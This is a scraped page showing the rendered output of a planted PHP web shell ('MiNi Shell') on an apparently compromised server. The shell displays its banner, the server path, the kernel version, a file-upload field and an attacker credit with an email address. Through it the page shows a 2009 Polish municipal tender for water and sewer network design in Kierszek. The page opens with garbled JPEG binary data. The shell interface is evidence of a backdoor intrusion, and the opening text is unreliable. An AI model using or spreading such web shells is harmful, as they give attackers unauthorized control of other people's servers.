JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090507/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090507/72605-N-2009.html

<p class="kh_header"><b>Konstancin-Jeziorna: Wykonanie projektu budowlanego i projektu wykonawczego wraz z kosztorysem inwestorskim i przedmiarem robót na budowę sieci wodociągowej i kanalizacji sanitarnej w ramach zadania budżetowego: Budowa sieci wod-kan. we wsi Kierszek</b><br>
<b>Numer ogłoszenia: 72605 - 2009; data zamieszczenia: 07.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta i Gminy Konstancin-Jeziorna , ul. Warszawska 32, 05-520 Konstancin-Jeziorna, woj. mazowieckie, tel. 022 756 48 10, 717-53-85, faks 022 756 48 85, 7564608.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.konstancin.eobip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie projektu budowlanego i projektu wykonawczego wraz z kosztorysem inwestorskim i przedmiarem robót na budowę sieci wodociągowej i kanalizacji sanitarnej w ramach zadania budżetowego: Budowa sieci wod-kan. we wsi Kierszek.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie koncepcji oraz projektu budowlanego i wykonawczego wraz z kosztorysem inwestorskim i przedmiarem robót na budowę sieci wodociągowej i kanalizacji sanitarnej  w ramach zadania budżetowego: (Budowa sieci wod-kan. we wsi Kierszek). 

Zakres projektu obejmuje:
1.Projekt na wykonanie sieci wodociągowej z rur PE o długości ok. 6130 mb, zasilanej z obszaru Skolimowa Zachodniego; kanalizacji sanitarnej grawitacyjnej z rur PCV długości ok. 6000 mb. wraz z przyłączami wod.-kan. do ok. 85 posesji (przyłącza każdej z sieci długości łącznej ok. 200m), transportującej medium do zlewni Skolimowa Zachodniego; projekty przecisków sterowanych pod torami kolejowymi, określenie warunków geologicznych dla projektowanych tras rurociągów oraz uzyskanie pozwolenia na budowę dla całego zadania . Przedmiotowe zadanie należy wykonać w nawiązaniu do projektu budowy sieci wodociągowej i kanalizacji sanitarnej terenów Skolimowa Zachodniego, opracowywanego aktualnie przez firmę EKO VERBUM Sp. z o.o., 02-672 Warszawa, ul. Domaniewska 47.
2.Ustalenie stanu własności na działkach objętych opracowaniem z uzyskaniem zgody na dysponowanie działką do celów budowlanych.
3.Koncepcja ( 2 egz.+ 1 egz. w wersji elektronicznej - pdf).
4.Projekt budowlany i projekt wykonawczy (5 egz. + 1 egz. w wersji elektronicznej -pdf) obejmujący:
- niezbędne projekty instalacyjno-technologiczne,
- ewentualną przebudowę infrastruktury kolidującej,
- niezbędne projekty konstrukcyjne,
- określenie wielkości zakresu robót związanych z odbudową dróg, zgodnie z warunkami technicznymi, które należy uzyskać od zarządcy dróg (wojewódzkich, gminnych).
5.Przedmiar robót (3 egz.).
6.Kosztorys inwestorski zapisany w wersji elektronicznej w formacie (ath) lub kompatybilne (zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. Dz.U.2004.130.1389 i uzgodnieniami z Zamawiającym).
7.Specyfikację techniczną wykonania i odbioru robót (zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. Dz.U.2004.202.2072).
8.Informację dotyczącą bezpieczeństwa i ochrony zdrowia.
9.Zapewnienie we własnym zakresie map do celów projektowych.
10.Inne niezbędne materiały i uzgodnienia (warunki techniczne ZGK, decyzje środowiskowe, zgoda mieszkańców, decyzja celu publicznego, w przypadku braku planu miejscowego, zgoda właściciela terenów kolejowych na których prowadzone będą  roboty).                                
11.Uzyskanie pozwolenia na budowę.

2. Inne informacje dotyczące przedmiotu zamówienia
1)Podstawą do wystawienia faktury :
- do wysokości 10% wartości wynagrodzenia ryczałtowego jest złożenie przez Wykonawcę    
  dokumentacji projektowej w zakresie wykonania koncepcji (pierwsza rata);
- do wysokości do 70% wartości wynagrodzenia ryczałtowego jest  złożenie przez Wykonawcę kompletnej
          dokumentacji projektowej w zakresie wykonania   projektu budowlanego i wykonawczego wraz z kosztorysem  
          inwestorskim przedmiarem robót i specyfikacją techniczną warunków wykonania (druga rata);
- do wysokości do 20% wartości wynagrodzenia ryczałtowego jest dostarczenie przez Wykonawcę decyzji o pozwoleniu na budowę właściwego organu nadzoru budowlanego (trzecia rata).
2)Zaleca się Wykonawcom zapoznanie się ze specyfiką terenu i warunkami lokalnymi, w których będzie realizowany przedmiot zamówienia.
3)Zamawiający oczekuje od Wykonawców odpowiedniego przygotowania kadrowego i technicznego, które pozwoli na terminowe i efektywne wykonanie prac objętych zamówieniem.
4)Do obowiązków Wykonawcy należy zaopatrzenie dokumentacji projektowej lub jej części stanowiącej umówiony przedmiot odbioru w wykaz opracowań oraz pisemne oświadczenie, iż dostarczona dokumentacja projektowa jest wykonana zgodnie z umową, obowiązującymi przepisami techniczno-budowlanymi oraz normami i że zostaje wydana w stanie zupełnym (kompletna z punktu widzenia celu, któremu ma służyć). Wykaz opracowań oraz pisemne oświadczenie, o którym mowa wyżej, stanowią integralną część przedmiotu odbioru..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 10.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda od wykonawców wniesienia wadium w kwocie: 4 000,00 zł
 (słownie: cztery tysięcy złotych).
2. Dopuszczalne formy wadium: 
1)  w pieniądzu, 
2) w poręczeniach bankowych lub poręczeniach  spółdzielczej kasy  oszczędnościowo-kredytowej , z tym że  
    poręczenie  kasy jest zawsze poręczeniem pieniężnym, 
3) gwarancjach  bankowych, 
4) gwarancjach ubezpieczeniowych, 
5) poręczenia  udzielane przez podmioty, o których mowa w art. 6 ust. 3 pkt 4 lit. b ustawy z dnia 9 listopada  
    2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 z późn. zm.).
6) Wadium wnoszone w pieniądzu należy wnieść na konto bankowe zamawiającego:Nr konta 15 8002 0004 
     0200 1111 2002 0067.
7) Wadium w innej formie niż pieniądz (oryginał dokumentu) należy zdeponować w:Wydziale Finansowym 
     Urzędu Miasta i Gminy Konstancin-Jeziorna ul. Warszawska 29 ( pomieszczenie kasy ) kopię dokumentu
     potwierdzoną za zgodność z oryginałem należy załączyć do oferty. 
8)  Wadium należy wnieść przed upływem terminu składania ofert.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Przystępując do postępowania w trybie przetargu nieograniczonego, każdy Wykonawca składa oświadczenie, że:
 1)    posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek  
        posiadania takich uprawnień;
 2)    posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do  
        wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału  
        technicznego i osób zdolnych do wykonania zamówienia;
3)posiada doświadczenie niezbędne do wykonania zamówienia, Zamawiający wymaga, by Wykonawca wykazał, że zrealizował, a w przypadku świadczeń okresowych lub ciągłych realizuje, w okresie ostatnich 3 lat przed dniem wszczęcia postępowania (bądź krótszym - jeżeli okres prowadzenia działalności jest krótszy) co najmniej 2 zamówienia odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, polegające na wykonaniu projektu budowlano-wykonawczego (budowa sieci wodociągowej  i kanalizacyjnej, sanitarnej) o wartości brutto min. 80 000 zł. (każde). Zamawiający będzie brał pod uwagę wyłącznie zamówienia, które zostaną poparte dokumentem, potwierdzającym, że zlecone prace zostały wykonane z należytą starannością,
4)dysponuje osobami zdolnymi do wykonania zamówienia, Zamawiający wymaga wykazania przez Wykonawcę, że dysponuje on lub będzie dysponował (lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia) co najmniej jedną osobą, która przy realizacji zamówienia pełnić będzie obowiązki: generalnego projektanta (kierownika-koordynatora ze strony Wykonawcy) procesu projektowego  w specjalności sanitarnej. Osoba ta musi posiadać uprawnienia do projektowania bez ograniczeń  w specjalności sanitarnej oraz posiadać aktualne zaświadczenie o przynależności do Okręgowej Izby Samorządu Zawodowego, w oparciu o art. 6 ust. 1 ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów oraz urbanistów  (Dz. U. z 2001 r., nr 5, poz.42 z późn. zm.),
5)nie podlega wykluczeniu z postępowania o udzielenie zamówienia (na podstawie art. 24 ust. 1 i 2 ustawy pzp).
2. Sposób dokonywania oceny spełniania warunków
1)Ocena spełniania warunków udziału w postępowaniu będzie prowadzona na podstawie treści złożonych oświadczeń i dokumentów, wymaganych zgodnie z rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006 roku w sprawie rodzajów dokumentów potwierdzających spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich może żądać Zamawiający od Wykonawcy (Dz. U. z 2006r. Nr 87, poz. 605), wskazanych w Rozdziale VII. SIWZ.
2)Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki Wykonawca spełnił.
3)Przy dokonywaniu oceny spełniania warunków Zamawiający będzie się kierował regułą (spełnia - nie spełnia).
4)Zamawiający  wzywa  Wykonawców , którzy  w określonym  terminie  nie złożyli  wymaganych przez Zamawiającego oświadczeń lub dokumentów , o których mowa  w art. 25 ust.1 , lub którzy nie złożyli  pełnomocnictw , albo którzy  złożyli  wymagane  przez zamawiającego  oświadczenia  i dokumenty , o których mowa  w art. 25 ust. 1 zawierające  błędy  lub którzy  złożyli  wadliwe pełnomocnictwa , do ich  złożenia w wyznaczonym terminie , chyba  że mimo  ich złożenia oferta Wykonawcy podlega  odrzuceniu  albo konieczne byłoby  unieważnienie  postępowania. Złożone na wezwanie Zamawiającego oświadczenia  i dokumenty  powinny potwierdzać  spełnienie  przez Wykonawcę warunków udziału  w postępowaniu  oraz spełnienie  przez oferowane usługi  wymagań  określonych  przez Zamawiającego, nie  później niż w dniu,  w którym  upłynął  termin składania ofert.
5)Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Na potwierdzenie spełnienia warunków, o których mowa w Rozdziale VI SIWZ Wykonawca musi dołączyć do oferty następujące dokumenty oraz oświadczenia (w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę):
1)wypełnione oświadczenie  Wykonawcy o spełnianiu warunków udziału w postępowaniu na formularzu stanowiącym załącznik nr 2 i nr 3,
2)aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (zgodnie z § 2 rozporządzenia z dnia 19 maja 2006r. - Dz.U.06.87.605).
3)aktualną informację z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 ustawy - wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (zgodnie z § 2 rozporządzenia z dnia 19 maja 2006r. - Dz.U.06.87.605).
4)aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie, lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej  3 miesiące przed upływem terminu składania ofert (zgodnie z § 2 rozporządzenia z dnia 19 maja 2006r. - Dz.U.06.87.605).
5)wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług, w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 2 zamówienia odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia,  każde o wartości nie mniejszej niż 80 000 zł brutto, ze wskazaniem ich wartości przedmiotu dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że te usługi zostały wykonane należycie. Za usługi odpowiadającą swoim rodzajem przedmiotowi zamówienia, Zamawiający uzna wykonanie projektu budowlanego i wykonawczego (budowa sieci wodociągowej i kanalizacyjnej sanitarnej - załącznik nr 4 do SIWZ,
6)wykaz osób którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia, a także zakresu wykonywanych przez nie czynności. Zamawiający wymaga wykazania przez Wykonawcę co najmniej jednej osoby, która przy realizacji zamówienia pełnić będzie obowiązki generalnego projektanta (kierownika-koordynatora ze strony Wykonawcy) procesu projektowego w specjalności sanitarnej. Osoba ta musi posiadać uprawnienia do projektowania bez ograniczeń w specjalności sanitarnej oraz posiadać aktualne zaświadczenie o przynależności do Okręgowej Izby Samorządu Zawodowego, w oparciu o art. 6 ust. 1 ustawy z dnia 15 grudnia 2000r.o samorządach zawodowych architektów, inżynierów oraz urbanistów (Dz. U. z 2001r., nr 5, poz.42 z późn. zm.), na formularzu stanowiącym załącznik nr 5 do SIWZ. Jeśli w wykazie, o którym mowa w punkcie a) Wykonawca wskaże, że będzie dysponował osobami, zobowiązany jest dołączyć do oferty pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia,
7)dokumenty projektanta (projektantów) potwierdzające posiadanie wymaganych uprawnień projektowych w specjalnościach odpowiadających przedmiotowi zamówienia i przynależność do właściwej terytorialnie Okręgowej Izby Samorządu Zawodowego Inżynierów..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.konstancin.eobip.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy Konstancin-Jeziorna, Wydział Inwestycji, ul. Warszawska 32,  pok.17.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2009 godzina 10:00, miejsce: Urząd Miasta i Gminy Konstancin - Jeziorna, ul. Warszawska 32, pok. nr 4 (kancelaria).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com